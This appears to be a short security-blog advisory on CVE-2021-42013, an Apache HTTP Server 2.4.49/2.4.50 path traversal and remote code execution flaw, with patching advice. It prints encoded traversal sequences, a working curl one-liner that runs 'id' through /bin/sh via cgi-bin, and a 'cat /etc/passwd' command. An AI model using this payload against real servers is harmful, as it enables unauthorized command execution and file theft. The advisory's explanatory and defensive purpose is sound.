Listen to this Post
How the mentioned CVE works:
The CVE-2021-42013 vulnerability is a path traversal and remote code execution flaw in Apache HTTP Server versions 2.4.49 and 2.4.50. The issue stems from an incomplete fix for CVE-2021-41773. A vulnerability in the path normalization logic allows an attacker to use crafted payloads containing encoded path traversal sequences, such as `.%2e/` or %%32%65/, to bypass security filters. If the `require all denied` directive is not set for specific directories like files/, a malicious actor can exploit this weakness. A specially crafted URL request can traverse the web root directory, potentially granting access to arbitrary files on the server’s filesystem. In configurations where CGI scripts are enabled, this traversal can be leveraged to achieve remote code execution, allowing the attacker to execute arbitrary shell commands on the underlying operating system with the privileges of the Apache process.
Platform: Apache HTTP Server
Version: 2.4.49/2.4.50
Vulnerability : Path Traversal
Severity: Critical
date: 2021-10-07
Prediction: 2021-10-07
What Undercode Say:
`curl -H “User-Agent: Mozilla” “http://target/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh” -d “echo;id”`
`cat /etc/passwd`
`require all denied`
How Exploit:
Craft URL with `.%2e/` sequences.
Target misconfigured CGI directories.
Execute system commands remotely.
Protection from this CVE:
Update to version 2.4.51.
Apply provided vendor patches.
Configure `require all denied`.
Impact:
Arbitrary File Read
Remote Code Execution
System Compromise
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
